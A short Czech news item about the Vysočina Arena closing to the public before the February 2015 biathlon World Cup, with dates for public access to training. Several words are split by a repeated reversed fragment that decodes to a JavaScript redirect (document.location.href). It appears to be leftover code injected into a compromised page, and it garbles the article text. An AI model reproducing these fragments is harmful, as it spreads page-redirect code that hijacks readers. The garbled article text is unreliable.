Vysočina Arena
Rainbow page separator

Vysočina Arena bude pro veřejnost uzavřena

Čtvrtek, 22. ledna 2015

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Uzavřena pro veřejnost bude novoměstská Vysočina Arena, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to od pondělí 26. ledna. Důvodem je příprava závodních tratí pro nadcházející Svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tový pohár v biatlonu. Ten se v Novém Městě na Moravě uskuteční první únorový týden. Závody a rovněž veškeré doprovodné akce, které se mimo Vysočina Arenu uskuteční i na novoměstském Vratislavově náměstí a pod sjezdovkou, jsou na programu od pátku 6. do neděle 8. února.
Návštěvníci Vysočina Areny se v souvislosti se Svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovým pohárem mohou přijít podívat i na tréninky biatlonistů – volný přístup do areálu je od úterý 3. února do čtvrtka 5. února, v pátek 6. února od poledne a dále v sobotu a v neděli od 9 hodin na základě vstupenky.
Zájemci z řad veřejnosti budou moci lyžařské s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topy ve Vysočina Areně opět využívat po skončení Svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového poháru.